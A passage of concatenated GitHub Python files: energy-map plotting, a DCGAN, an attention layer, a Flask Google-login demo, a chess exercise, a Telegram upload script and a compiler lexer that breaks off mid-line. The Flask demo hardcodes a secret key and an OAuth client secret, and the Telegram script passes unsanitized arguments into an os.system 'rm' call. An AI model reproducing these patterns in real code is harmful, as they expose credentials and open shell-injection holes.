& (plot_df['batt_size'] == batt_size) & (plot_df['tech'] == tech)]\n\n # --- pick best tech for each geo ---\n plot_df.sort_values(column, ascending=ascending, inplace=True)\n plot_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n \n # --- Clean up column string ---\n clean_column = column.replace('_',' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n \n fig, ax = plt.subplots(dpi=200)\n \n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n\n if reverse_cmap:\n cmap = cmap + '_r'\n \n plot_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=ax, scheme='Percentiles')\n \n if self.region_label_pct > 0:\n \n plot_df['area_pct'] = plot_df.area.rank(pct=True)\n \n for _, row in plot_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n ax.annotate(text=f\"{int(round(row[column], 0)):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n ax.axis('off')\n \n if title != None:\n ax.set_title(title)\n\n def triple_choropleth(self, column, tech, batt_size=0, ascending=False, storage=True, reverse_cmap=False, title=None, *kwargs):\n\n # --- Update crs ---\n self._update_crs()\n \n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n plot_df = plot_df.loc[(plot_df['batt_size'] == batt_size)]\n cutoffs = plot_df[column].quantile(list(np.arange(0,1,0.2))).to_list()\n classification_kwds = dict(bins=cutoffs)\n plot_df = plot_df.loc[(plot_df['tech'] == tech)]\n\n # --- Clean up column string ---\n clean_column = column.replace('_', ' ').title()\n clean_column = f\"{clean_column} {self.suffix}\"\n\n if tech == 'pv':\n cmap = 'Oranges'\n elif tech == 'wind':\n cmap = 'Blues'\n if reverse_cmap:\n cmap = cmap + '_r'\n\n fig, axs = plt.subplots(figsize=(8,4), dpi=400, ncols=3)\n\n for i, s in enumerate(['StdScen20_LowRECost', 'StdScen20_MidCase', 'StdScen20_HighRECost']):\n scenario_df = plot_df.loc[plot_df['scenario'] == s]\n\n # --- pick best tech for each geo ---\n scenario_df.sort_values(column, ascending=ascending, inplace=True)\n scenario_df.drop_duplicates(subset=['region'], keep='first', inplace=True)\n scenario_df.plot(column, edgecolor='k', cmap=cmap, alpha=0.8, linewidth=0.2, ax=axs[i],\n scheme='UserDefined', classification_kwds=classification_kwds)\n \n if self.region_label_pct > 0:\n \n scenario_df['area_pct'] = scenario_df.area.rank(pct=True)\n \n for _, row in scenario_df.iterrows():\n if row['area_pct'] > self.region_label_pct:\n axs[i].annotate(text=f\"{int(round(row[column], 0)):,}\",\n xy=row['geometry'].centroid.coords[0],\n horizontalalignment='center',\n size=7)\n \n axs[i].axis('off')\n axs[i].set_title(scen_label_dict[s], fontsize=10)\n plt.tight_layout()\n\n\n def supply_curve(self, column, scenario, label='Marginal Price\\n($/MWh)', batt_sizes=None, ascending=True, legend=True):\n\n # --- Update units ---\n plot_df = self._update_units(column)\n\n # --- subset scenario ---\n no_batt = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == 0)]\n\n # --- drop duplicate techs for same state ---\n no_batt.sort_values(column, ascending=ascending, inplace=True)\n no_batt.drop_duplicates(subset=['region', 'scenario'], inplace=True, keep='first')\n\n # --- mock up widths and bar positions and color ---\n width = [i for i in no_batt['system_capacity']]\n\n relative_positions = []\n relative_position = 0\n previous_width = 0\n for w in width:\n relative_position = float(relative_position + (previous_width/2) + (w/2))\n previous_width = w\n relative_positions.append(relative_position)\n \n colors = no_batt['tech'].map(tech_dict)\n \n fig, ax = plt.subplots(figsize=(8,2), dpi=400)\n ax.bar(relative_positions, no_batt[column],\n width=width, linewidth=0.0,\n color=colors)\n \n # --- mock up label positions ---\n odd = -1\n for i, l in enumerate(no_batt['region']):\n x = relative_positions[i]\n y_max = list(no_batt[column])[i]\n y = y_max / 2 + (odd * y_max * 0.075)\n ax.annotate(l, xy=(x,y), ha='center',va='bottom',\n fontsize=6)\n odd *= -1\n\n # --- plot battery bars ---\n if batt_sizes != None:\n for batt_size in batt_sizes:\n batt = plot_df.loc[(plot_df['scenario'] == scenario) & (plot_df['batt_size'] == batt_size)]\n batt.sort_values(column, ascending=ascending, inplace=True)\n batt.drop_duplicates(subset=['region', 'scenario'], inplace=True, keep='first')\n\n ax.bar(relative_positions, batt[column],\n width=width, linewidth=0.0,\n color=nrel_color_dict[3], alpha=0.5, zorder=0)\n\n # --- clean up ---\n plt.title(f'{scen_label_dict[scenario]}', fontsize=10)\n plt.subplots_adjust(hspace=0.5)\n plt.ylabel(label)\n plt.xlabel('')#Cumulative RE Capacity')\n # plt.ylim(-5, 70)\n plt.tight_layout()\n\n if legend:\n label_dict = {'pv':'Solar PV', 'wind':'Wind', 'batt':'w/ 4 hr Battery'}\n custom_patches = [mpatches.Patch(color=v, label=label_dict[k]) for k,v in tech_dict.items()]\n plt.legend(handles=custom_patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n\n sns.despine(fig)\n\n \n def scatter_facet(self, xcol, ycol, legend=False):\n \n # --- Update units ---\n plot_df = self.gdf.copy()\n \n sns.set_style()\n fig, axs = plt.subplots(figsize=(10,6), nrows=2, ncols=3, sharey=True, dpi=400)\n\n\n for i_scenario, s in enumerate(['StdScen20_LowRECost', 'StdScen20_MidCase', 'StdScen20_HighRECost']):\n for i_tech, tech in enumerate(['pv','wind']):\n for b in set(plot_df['batt_size']):\n scenario_df = plot_df.loc[(plot_df['scenario'] == s) & (plot_df['batt_size'] == b) & (plot_df['tech'] == tech)]\n\n colors = scenario_df['tech'].map(tech_dict)\n label = f\"{tech.capitalize()} - {int(b)} MW Batt\"\n axs[i_tech][i_scenario].scatter(\n x=scenario_df[xcol],\n y=scenario_df[ycol],\n s=80,\n # s=scenario_df[zcol] * 2,\n c=colors, marker=batt_size_dict[b],\n alpha=0.3, edgecolor=\"k\", linewidth=0.5,\n label=label)\n\n poly = np.poly1d(np.polyfit(scenario_df[xcol], scenario_df[ycol], 2))\n x_min = scenario_df[xcol].min() * 0.9\n x_max = scenario_df[xcol].max() * 1.1\n x_range = np.linspace(x_min, x_max, 50)\n axs[i_tech][i_scenario].plot(\n x_range, poly(x_range),\n c=tech_dict[tech], linewidth=3, alpha=0.8)\n\n if i_scenario == 0:\n axs[i_tech][i_scenario].set_ylabel('Lifetime Cumulative \\n Grid Value')\n\n if i_tech == 1:\n axs[i_tech][i_scenario].set_xlabel('Marginal Cost ($/MWh)')\n \n if i_tech ==0:\n axs[i_tech][i_scenario].set_title(scen_label_dict[s])\n axs[i_tech][i_scenario].get_xaxis().set_visible(False)\n\n axs[i_tech][i_scenario].set_xlim(0, 100)\n axs[i_tech][i_scenario].set_ylim(0.4*1e8, 1.8*1e8)\n \n if legend:\n solar_handles, solar_labels = axs[i_tech-1][i_scenario].get_legend_handles_labels()\n wind_handles, wind_labels = axs[i_tech][i_scenario].get_legend_handles_labels()\n fig.legend(solar_handles+wind_handles, solar_labels+wind_labels, bbox_to_anchor=(1.2, 1))\n\n sns.despine()\n plt.tight_layout()\n\n","repo_name":"NREL/vapor","sub_path":"vapor/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":16417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"22672537796","text":"import torch\nimport torch.nn as nn\n\n# code from https://github.com/pytorch/examples/blob/main/dcgan/main.py\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n torch.nn.init.normal_(m.weight, 1.0, 0.02)\n torch.nn.init.zeros_(m.bias)\n\n# only training on one gpu\n# ngf = number of filters in the generator\n# nz = size of the latent z vector\n# nc = number of channels\nclass Generator(nn.Module):\n def __init__(self, ngf: int, nc: int, nz: int):\n super(Generator, self).__init__()\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\n# ndf = number of filters in the discriminator\n# nc = number of channels\nclass Discriminator(nn.Module):\n def __init__(self, ndf, nc):\n super(Discriminator, self).__init__()\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, input):\n output = self.main(input)\n return output.view(-1, 1).squeeze(1)\n\n","repo_name":"eth-easl/orion","sub_path":"related/baselines/dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"17141365180","text":"import torch\nimport math\n\nfrom vistem.modeling.layers import Conv2d, unfold_2d, fold_2d\nfrom . import PLANDecode\n\n__all__ = ['PLANBottomUp']\n\nclass PLANBottomUp(PLANDecode):\n def __init__(self, top_feat, bot_feat, in_channels, plan_cfg):\n super().__init__()\n self.decode_cfg(plan_cfg)\n self.out_channels = in_channels\n\n self.top_key = Conv2d(in_channels, self.num_heads * self.key_dim, 1, stride=1, bias=False)\n self.bot_query = Conv2d(in_channels, self.num_heads * self.key_dim, 1, stride=1, bias=False)\n self.bot_value = Conv2d(in_channels, self.num_heads * self.value_dim, 1, stride=1, bias=False)\n \n self.top_fuse = Conv2d(self.num_heads * self.value_dim, self.out_channels, 1, stride=1, bias=False)\n\n for layer in self.modules():\n if isinstance(layer, Conv2d):\n torch.nn.init.normal_(layer.weight, mean=0, std=0.01)\n if layer.bias is not None : torch.nn.init.constant_(layer.bias, 0)\n\n def forward(self, x):\n top_feat, bot_feat = x\n top_key = self.top_key(top_feat).split(self.key_dim, dim=1)\n bot_query = self.bot_query(bot_feat).split(self.key_dim, dim=1)\n bot_value = self.bot_value(bot_feat).split(self.value_dim, dim=1)\n\n top_results = []\n for head_idx in range(self.num_heads):\n bot_Q = unfold_2d(bot_query[head_idx], kernel_size=self.erf, padding=(self.erf-1)//2, stride=2) # (B, 9, C, H, W)\n bot_V = unfold_2d(bot_value[head_idx], kernel_size=self.erf, padding=(self.erf-1)//2, stride=2) # (B, 9, C, H, W)\n top_K = top_key[head_idx] # (B, C, H, W)\n\n top_weight = (top_K.unsqueeze(dim=1) * bot_Q).sum(dim=2) / math.sqrt(self.key_dim)\n top_weight = top_weight.softmax(dim=1) # (B, 9, H, W)\n\n top_out = (top_weight.unsqueeze(dim=2) * bot_V) # (B, 9, C, H, W)\n top_out = torch.sum(top_out, dim=1)\n top_results.append(top_out)\n\n top_results = torch.cat(top_results, dim=1)\n top_results = self.top_fuse(top_results)\n\n return top_results","repo_name":"major196512/vistem","sub_path":"vistem/modeling/backbone/plan/inter_layer/bottom_up.py","file_name":"bottom_up.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"29960966273","text":"import json\n\nfrom flask import Flask, url_for, redirect, session, jsonify\n\nfrom flask_login import (UserMixin, login_required, login_user, logout_user,\n current_user)\nfrom flask_googlelogin import GoogleLogin\n\n\nusers = {}\n\n\napp = Flask(__name__)\napp.config.update(\n SECRET_KEY='Miengous3Xie5meiyae6iu6mohsaiRae',\n GOOGLE_LOGIN_CLIENT_ID='204903060412.apps.googleusercontent.com',\n GOOGLE_LOGIN_CLIENT_SECRET='9LQdzxkGfM2BTM10dz49uWLI',\n GOOGLE_LOGIN_REDIRECT_URI='http://localhost:5000/oauth2callback')\ngooglelogin = GoogleLogin(app)\n\n\nclass User(UserMixin):\n def __init__(self, userinfo):\n self.id = userinfo['id']\n self.name = userinfo['name']\n self.picture = userinfo.get('picture')\n\n\n@googlelogin.user_loader\ndef get_user(userid):\n return users.get(userid)\n\n\n@app.route('/')\ndef index():\n return \"\"\"\n

Login

\n \"\"\" % (\n googlelogin.login_url(approval_prompt='force', access_type='offline'),\n )\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n return \"\"\"\n

Hello, %s

\n

\n

Token: %r

\n

Get new access token

\n

Logout

\n \"\"\" % (current_user.name, current_user.picture, session.get('token'))\n\n\n@app.route('/oauth2callback')\n@googlelogin.oauth2callback\ndef login(token, userinfo, **params):\n user = users[userinfo['id']] = User(userinfo)\n login_user(user)\n session['token'] = json.dumps(token)\n return redirect(params.get('next', url_for('.profile')))\n\n\n@app.route('/get_access_token')\n@login_required\ndef get_access_token():\n refresh_token = json.loads(session['token'])['refresh_token']\n return jsonify(googlelogin.get_access_token(refresh_token))\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n session.clear()\n return \"\"\"\n

Logged out

\n

Return to /

\n \"\"\"\n\n\napp.run(debug=True)\n","repo_name":"insynchq/flask-googlelogin","sub_path":"example_offline.py","file_name":"example_offline.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"7"} +{"seq_id":"1919760673","text":"# https://www.acmicpc.net/problem/3003\n\nchese_piece = list(map(int, input().split(\" \")))\n# 킹 1개, 퀸 1개, 룩 2개, 비숍 2개, 나이트 2개, 폰 8개로 구성되어 있다.\n## 체크용 체스 피스 리스트\ncheck_piece = [1, 1, 2, 2, 2, 8]\n\nfor i in range(5):\n check_piece[i] -= chese_piece[i]\n\nprint(*check_piece, sep=\" \")","repo_name":"ContecPluto/algorithm","sub_path":"Personal_learning/baekjoon/3003_chese.py","file_name":"3003_chese.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19274416722","text":"from pathlib import Path\r\nimport os\r\nclass Config:\r\n API_ID = int(os.environ.get('API_ID'))\r\n API_HASH = os.environ.get('API_HASH')\r\n BOT_TOKEN2 = os.environ.get('BOT_TOKEN2')\r\n CHATID = int(os.environ.get('CANAL_Sendvideo'))\r\n\r\nimport secrets\r\nimport argparse\r\nparser = argparse.ArgumentParser(description = 'test')\r\nparser.add_argument('--nomedoarquivo', action = 'store', dest = 'nomedoarquivo',default = 'WORK', required = True,help = 'Nome do aquivo de video')\r\nparser.add_argument('--legenda', action = 'store', dest = 'legenda',default = 'WORK', required = True,help = 'legendadoarquivo')\r\nparser.add_argument('--photo', action = 'store', dest = 'photo',default = 'WORK', required = True,help = 'photo')\r\nparser.add_argument('--photo2', action = 'store', dest = 'photo2',default = 'WORK', required = True,help = 'photo2')\r\narguments = parser.parse_args()\r\n\r\n\r\n\r\nimport asyncio\r\nfrom telethon import TelegramClient, sync\r\nfrom telethon.tl.types import DocumentAttributeVideo\r\nfrom hachoir.metadata import extractMetadata\r\nfrom hachoir.parser import createParser\r\nusuario = secrets.token_hex(15)\r\n#Dados Telegram:\r\nclient = TelegramClient(f'bot{usuario}', Config.API_ID, api_hash=Config.API_HASH).start(bot_token=Config.BOT_TOKEN2)\r\n\r\n# duração video:\r\nfile_name = ('{}'.format(arguments.nomedoarquivo))\r\nDuracao_video = extractMetadata(createParser(file_name))\r\nduration = Duracao_video.get('duration').seconds\r\n\r\n# imagem dimensões:\r\nfile_foto = ('{}'.format(arguments.photo))\r\nDimensao_Imagem = extractMetadata(createParser(file_foto))\r\n\r\n\r\ntry:\r\n async def main():\r\n file = await client.upload_file(file_name)\r\n await client.send_file(Config.CHATID,file,thumb=f'{arguments.photo}',caption=f'{arguments.legenda}',use_cache=False,attributes=(DocumentAttributeVideo((0, Duracao_video.get('duration').seconds)[Duracao_video.has('duration')],(0, Dimensao_Imagem.get('width'))[Dimensao_Imagem.has('width')],(0, Dimensao_Imagem.get('height'))[Dimensao_Imagem.has('height')],supports_streaming=True),))\r\n await client.send_file(Config.CHATID, f'{arguments.photo2}' , caption=f'{arguments.legenda}')\r\n os.system(f'(rm {arguments.nomedoarquivo} && rm {arguments.photo} && rm {arguments.photo2})&')\r\nexcept:\r\n pass\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(main())\r\n","repo_name":"maizumbotzin/newtango2bot","sub_path":"up.py","file_name":"up.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"2858479162","text":"# ***************************** #\n# Deligiannis Nikos 2681 #\n# UoI - Spring Semester 2018 #\n# Compilers MYY802 prof G.Manis #\n# Project: Compiler for EEL #\n# ***************************** #\n\n# ********************************************** TERMINAL SYNTAX ********************************************** #\n# #\n# >python EELC.py [source file] [options]< #\n# #\n# -[filename]: The name of the .eel file (Source Code) #\n# -[verbose]: Detailed output of Lexical and Syntactical analysis. #\n# If you do not want a verbosed output simply type '-skip' ! You will be notified about #\n# the test results of Lexical and Syntactical Analysis. #\n# If you want a verbosed output type \"-verbose\" after the [filename] #\n# Due to wealth of text messages, redirected output is strongly reccomended!! #\n# For example python EELC.py example verbose > output.txt! #\n# #\n# *************************************************************************************************************\n\nimport sys\n\n# [PHASE: 1] :: Lexical and Syntactical Analysis\n\n#Global Scope Variables \n\ntoken_dict = dict(alphaTK = 1, # Alpharithmetic - String (e.g Compiler)\n numberTK = 2, # Any Number (e.g 65)\n plusTK = 3, # +\n minusTK = 4, # -\n mulTK = 5, # *\n divTK = 6, # /\n lessTK = 7, # <\n greaTK = 8, # >\n leqTK = 9, # <= \n greqTK = 10, # >= \n eqTK = 11, # =\n difTK = 12, # <>\n assigTK = 13, # :=\n semiTK = 14, # ;\n commaTK = 15, # , \n colonTK = 16, # :\n lbrTK = 17, # (\n rbrTK = 18, # )\n blbrTK = 19, # [\n brbrTK = 20, # ]\n #Commited Words#\n progTK = 100, # program\n eprogTK = 101, # endprogram\n decTK = 102, # declare\n edecTK = 103, # enddeclare\n ifTK = 104, # if\n thenTK = 105, # then\n elseTK = 106, # else\n eifTK = 107, # endif\n whileTK = 108, # while\n ewhileTK = 109, # endwhile\n repTK = 110, # repeat\n erepTK = 111, # endrepeat\n exitTK = 112, # exit\n swiTK = 113, # switch\n caseTK = 114, # case\n eswiTK = 115, # endswitch\n fcaseTK = 116, # forcase\n whenTK = 117, # when\n efcaseTK = 118, # endforcase\n procTK = 119, # procedure\n eprocTK = 120, # endprocedure\n funTK = 121, # function\n efunTK = 122, # endfunction\n callTK = 123, # call\n retTK = 124, # return\n inTK = 124, # in \n inoutTK = 125, # inout\n andTK = 126, # and\n orTK = 127, # or\n notTK = 128, # not \n trueTK = 129, # true \n falseTK = 130, # false\n inputTK = 131, # input\n printTK = 132, # print \n #Special Tokens#\n eofTK = 200, # End of File\n errTK = 201, # Error || Won't be used\n cmtTK = 202) # Comment(s) || Won't be used\n\nglobal max_word_size\nmax_word_size = 30 # An Alpharithmetic can't be over 30 char's long\nglobal line\nline = 1 # The current line (used for debugging messages)\nglobal ret_token\nret_token = 0 # The token lex() will return\nglobal lex_unit\nlex_unit = \"\" # The lexical unit lex() will return\n\nglobal code # File pointer of the Source Code\n\n\n\n# This function is used by lex() in some cases we need to get the previous character \ndef backtrack():\n global code\n position = code.tell()\n code.seek(position - 1)\n\n# Lexical Analysis #\n\ndef lex():\n\n global lex_unit # Linking the Global Variables\n lex_unit = \"\" \n global line \n global ret_token\n global code\n\n while True:\n\n unit = code.read(1)\n \n if not unit : \n \n break # EOF reached break the loop.\n \n if unit == '\\n' : line = line + 1 \n\n if unit == '\\t' : continue # Ignore TABs\n\n if unit.isspace() : continue\n\n # -------------------[State 1 of the FSM]------------------- #\n # -Character found. Keep reading until you read him whole #\n # -Check for commited words. Else return alphaTK. #\n # -Must be <= 30 characters long. #\n # -IMPORTANT: Backtrack is required after while() #\n # ---------------------------------------------------------- #\n \n if unit.isalpha(): \n\n alpha_flag = 0\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n while ( (unit.isalpha() or unit.isdigit() ) and len(lex_unit) <= max_word_size ):\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '\\n' : line = line + 1\n\n if(lex_unit != \"endprogram\"): #and unit != '\\n'):\n backtrack()\n\n if lex_unit == \"program\":\n ret_token = token_dict[\"progTK\"]\n return token_dict[\"progTK\"]\n if lex_unit == \"endprogram\":\n ret_token = token_dict[\"eprogTK\"]\n return token_dict[\"eprogTK\"]\n if lex_unit == \"declare\":\n ret_token = token_dict[\"decTK\"]\n return token_dict[\"decTK\"]\n if lex_unit == \"enddeclare\":\n ret_token = token_dict[\"edecTK\"]\n return token_dict[\"edecTK\"]\n if lex_unit == \"if\":\n ret_token = token_dict[\"ifTK\"]\n return token_dict[\"ifTK\"] \n if lex_unit == \"then\":\n ret_token = token_dict[\"thenTK\"]\n return token_dict[\"thenTK\"]\n if lex_unit == \"else\":\n ret_token = token_dict[\"elseTK\"]\n return token_dict[\"elseTK\"]\n if lex_unit == \"endif\":\n ret_token = token_dict[\"eifTK\"]\n return token_dict[\"eifTK\"]\n if lex_unit == \"while\":\n ret_token = token_dict[\"whileTK\"]\n return token_dict[\"whileTK\"]\n if lex_unit == \"endwhile\":\n ret_token = token_dict[\"ewhileTK\"]\n return token_dict[\"ewhileTK\"]\n if lex_unit == \"repeat\":\n ret_token = token_dict[\"repTK\"]\n return token_dict[\"repTK\"]\n if lex_unit == \"endrepeat\":\n ret_token = token_dict[\"erepTK\"]\n return token_dict[\"erepTK\"]\n if lex_unit == \"exit\":\n ret_token = token_dict[\"exitTK\"]\n return token_dict[\"exitTK\"]\n if lex_unit == \"switch\":\n ret_token = token_dict[\"swiTK\"]\n return token_dict[\"swiTK\"]\n if lex_unit == \"case\":\n ret_token = token_dict[\"caseTK\"]\n return token_dict[\"caseTK\"]\n if lex_unit == \"endswitch\":\n ret_token = token_dict[\"eswiTK\"]\n return token_dict[\"eswiTK\"]\n if lex_unit == \"forcase\":\n ret_token = token_dict[\"fcaseTK\"]\n return token_dict[\"fcaseTK\"]\n if lex_unit == \"when\":\n ret_token = token_dict[\"whenTK\"]\n return token_dict[\"whenTK\"]\n if lex_unit == \"endforcase\":\n ret_token = token_dict[\"efcaseTK\"]\n return token_dict[\"efcaseTK\"]\n if lex_unit == \"procedure\":\n ret_token = token_dict[\"procTK\"]\n return token_dict[\"procTK\"]\n if lex_unit == \"endprocedure\":\n ret_token = token_dict[\"eprocTK\"]\n return token_dict[\"eprocTK\"]\n if lex_unit == \"function\":\n ret_token = token_dict[\"funTK\"]\n return token_dict[\"funTK\"]\n if lex_unit == \"endfunction\":\n ret_token = token_dict[\"efunTK\"]\n return token_dict[\"efunTK\"]\n if lex_unit == \"call\":\n ret_token = token_dict[\"callTK\"]\n return token_dict[\"callTK\"]\n if lex_unit == \"return\":\n ret_token = token_dict[\"retTK\"]\n return token_dict[\"retTK\"]\n if lex_unit == \"in\":\n ret_token = token_dict[\"inTK\"]\n return token_dict[\"inTK\"]\n if lex_unit == \"inout\":\n ret_token = token_dict[\"inoutTK\"]\n return token_dict[\"inoutTK\"]\n if lex_unit == \"and\":\n ret_token = token_dict[\"andTK\"]\n return token_dict[\"andTK\"]\n if lex_unit == \"or\":\n ret_token = token_dict[\"orTK\"]\n return token_dict[\"orTK\"]\n if lex_unit == \"not\":\n ret_token = token_dict[\"notTK\"]\n return token_dict[\"notTK\"]\n if lex_unit == \"true\":\n ret_token = token_dict[\"trueTK\"]\n return token_dict[\"trueTK\"]\n if lex_unit == \"false\":\n ret_token = token_dict[\"falseTK\"]\n return token_dict[\"falseTK\"]\n if lex_unit == \"input\":\n ret_token = token_dict[\"inputTK\"]\n return token_dict[\"inputTK\"]\n if lex_unit == \"print\":\n ret_token = token_dict[\"printTK\"]\n return token_dict[\"printTK\"]\n\n ret_token = token_dict[\"alphaTK\"] #Default case, its an alpharithmetic (e.g. variableA)\n return token_dict[\"alphaTK\"]\n\n # -------------------[State 2 of the FSM]------------------- #\n # -Digit is found. Read the whole number! #\n # -Constrains: A. number <= 32767 #\n # B. alphabetics not allowed after digit #\n # -IMPORTANT: Backtrack is required at the end! #\n # ---------------------------------------------------------- #\n\n if unit.isdigit():\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n while (unit.isdigit()):\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '\\n' : line = line + 1\n\n if(unit.isalpha()): #[A]\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n \n -Invalid Sequence detected\n --After you cannot have numbers with alpharithmetics in them\n ---Example: Sequence \"123abc\" is not acceptable\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n tmp_num = int(lex_unit) #[B] :: [NOTE] :: No need to check if the number is >= -32767 ! Grammar will provide the sign \n if tmp_num >= 32767: \n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -Invalid Number\n --Acceptable numbers are:\n ---Numbers greater or equal to -32767 [ >= -32767]\n ---Numbers lower or equal to 32767 [<= 32767]\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n backtrack()\n ret_token = token_dict[\"numberTK\"]\n return token_dict[\"numberTK\"]\n\n if unit == '+':\n \n lex_unit = lex_unit + unit\n ret_token = token_dict[\"plusTK\"]\n return token_dict[\"plusTK\"]\n\n if unit == '-':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"minusTK\"]\n return token_dict[\"plusTK\"]\n\n # -------------------[State 3 of the FSM]------------------- #\n # -Symbol '*' found. Must see what follows in case of error! #\n # -If what follows is '/' then error (closing comments) #\n # -else return '*' + token #\n # -IMPORTANT: Backtrack is required at the end! #\n # ---------------------------------------------------------- #\n\n if unit == '*':\n\n lex_unit = lex_unit + unit\n \n unit = code.read(1)\n\n if unit == '/':\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -You marked the end of a comment section '*/'\n -You havend though marked the start of it '*/'\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n backtrack()\n ret_token = token_dict[\"mulTK\"]\n return token_dict[\"mulTK\"]\n\n if unit == ',':\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"commaTK\"]\n return token_dict[\"commaTK\"]\n\n # -------------------[State 4 of the FSM]------------------- #\n # -Symbol '/' found. Must see what follows! #\n # -Three possible scenarios to begin with #\n # [A]: /* Comment initializer #\n # [B]: // Comment until new line #\n # [C]: / Division operator #\n # -IMPORTANT: Backtrack is required in case [C] #\n # -IMPORTANT: In case of comments, lex() has call itself #\n # to return the next lex_unit and token!! #\n # ---------------------------------------------------------- #\n\n if unit == '/':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '*': # [A]: Comment initializer found! Keep reading until you find '*/'\n\n tmp_flag = 0\n\n tmp_err = line # Used in case of an error!\n\n while(tmp_flag == 0):\n\n unit = code.read(1)\n\n if unit == '\\n': line = line + 1\n\n if unit == '*':\n\n unit = code.read(1)\n\n if not unit : # Reached EOF without closing comments\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -EOF Reached while reading comments\n --A Comment section has not been terminated\n\n -Comments initiated at Line: %d\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(tmp_err,line))\n exit()\n\n if(unit == '/') : tmp_flag = 1\n\n if not unit : # Reached EOF without closing comments\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -EOF Reached while reading comments\n --A Comment section has not been terminated\n\n -Comments initiated at Line: %d\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(tmp_err,line))\n exit()\n\n return lex() \n\n\n elif unit == '/': # [B]: Comment the whole line\n\n tmp_flag = 0\n\n while(tmp_flag == 0):\n\n unit = code.read(1)\n\n if unit == '\\n': tmp_flag = 1 # End of line reached! Stop!\n\n return lex()\n\n else: # [C]: Division operator. Baktrack required \n\n backtrack()\n ret_token = token_dict[\"divTK\"]\n return token_dict[\"divTK\"]\n\n if unit == '=':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"eqTK\"]\n return token_dict[\"eqTK\"]\n\n if unit == ';':\n #print(\"Semicolon\")\n lex_unit = lex_unit + unit\n ret_token = 